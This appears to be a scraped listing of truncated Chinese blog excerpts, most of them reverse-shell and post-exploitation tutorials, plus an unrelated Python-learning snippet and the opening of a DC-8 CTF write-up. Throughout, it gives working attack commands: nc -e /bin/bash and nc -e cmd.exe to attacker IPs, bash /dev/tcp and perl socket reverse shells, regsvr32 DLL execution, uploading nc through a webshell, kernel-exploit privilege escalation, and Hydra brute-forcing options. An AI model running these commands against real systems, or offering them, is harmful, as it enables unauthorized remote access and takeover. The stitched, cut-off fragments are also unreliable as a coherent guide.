说明: PS:我本机是linux,因为没有服务器所以使用win7来演示．倘若你是windows可以在本机生成dll以后再放到服务器上面去执行dll即可反弹shell物理机ip:192.168.1.121 linux目标服务器ip:172.16.150.139 win7工具下载地址:https://www.t00ls.net/thread-46304-1-1.html 本地先监听一个端口 然后配置 ip地址是要反弹的ip 然后生成dll最后用cmd执行: regsvr32 /s /u server…

假如ubuntu.CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu.CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp -e /bin/bash kali上输入 nc 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell. 需要目标机安装nc. 反向反弹shell 方法1:bash反弹 bash -i >& /dev…

nc -l -v -p 80在本机监听80端口,此时80端口是打开的,我们可以在浏览器输入127.0.0.1进行浏览,此时就会出现连接,我们再在监听窗口输入字符,就会在浏览器上显示了.知道上面的作用后,我们就可以在此的基础上,再在webshell里面执行 nc -e cmd.exe 192.168.246.1 80此条命令会把cmd反弹到192.168.246.1上,我们就可以想在本地一样,使用cmd. 这里是nc的命令说明: -l 监听本地入栈信息 -p port 打开本地端口 -t 以tel…

Server-U等都不可以用的情况下.   一般都可思考用此方法不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口…   那么这种方法也失效了…. 1:通过shell将上传NC和CMD传到站点目录下(这里一定上传的注意权限,最好是可读写目录下)web目录都是有写有读的权限,我们直接传NC进去 2:然后本地执行nc -vv -lp 52进行反弹 3:在shell命令下执行F:\wwwroot\img\nc.exe  -e cmd上传路径  IP(外网IP)  52(这…

本机开启监听: nc -lvnp 4444nc -vvlp 4444 目标机器开启反弹 bash版本: bash -i >& /dev/tcp/ >& perl版本: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))…

很多时候linux拿到shell了,然后在菜刀或Shell里执行简单命令不允许!说明权限很死或者被管理禁止了!这里我已NC将SHELL反弹回本地提权!先看下linux内核 2.6.18-194.11.3.el5 内核 ,这个好CentOS release 5.5的系统! 找个外网IP 监听12666,当然12666也可以改.我这里用NC监听nc -l -n -v -p 12666 然后再点你shell 连接成功就出现下面的内容 然后百度找2.6.18-194这个内核的EXP,我已经收藏过.然后通…

就我个人在学习Python的过程中,经常会出现学习了新方法后,如果隔上几天不用,就忘了的情况,或者刚学习的更好的方法没有得到应用,还是沿用已有的方法,这样很不利于学习和掌握新姿势,从而拉长学习时间,增加学习成本. 为此,我觉得有必要把各种方法或者技巧的用处和其典型例子记录下来,方便在空闲时间翻阅,并在实操上合理应用,对提高掌握新姿势的效率会很有好处. 注意:以下基于Python3 基础篇 一.数据类型 1.list中增加元素,追加元素到末尾:list.append('元素').插入到指定的位置:…

VPS监听: aliyun:  nc -lvnp 7777 监听7777端口 被监听: nc -w 10 -e /bin/bash 8.130.49.121 7777  (-w:连接超时时间 -e 使用bash命令 ip 端口号)…

这个也是backtrack下面很受欢迎的一个工具 参数详解:-R 根据上一次进度继续破解-S 使用SSL协议连接-s 指定端口-l 指定用户名-L 指定用户名字典(文件)-p 指定密码破解-P 指定密码字典(文件)-e 空密码探测和指定用户密码探测(ns)-C 用户名可以用:分割(username:password)可以代替-l username -p password-o 输出文件-t 指定多线程数量,默认为16个线程-vV 显示详细过程server 目标IPservice 指定服务名(tel…

前言: 本文将讲述通过信息收集,再web站点的sql注入漏洞加john爆破登录后台,然后找到远程代码执行漏洞getshell,最后用exim4命令提权漏洞进行权限提升拿到最终的flag. 0x00 环境 VMware 15虚拟机软件: DC-8靶机虚拟机(NAT模式): kali虚拟机(NAT模式),ip为:192.168.106.129 0x01 信息收集 由于两台机子都开启的是nat模式,那么是在同一个网段里面.我们就可以是用namp先进行同网段的ip存活扫描. kali的ip为192.16…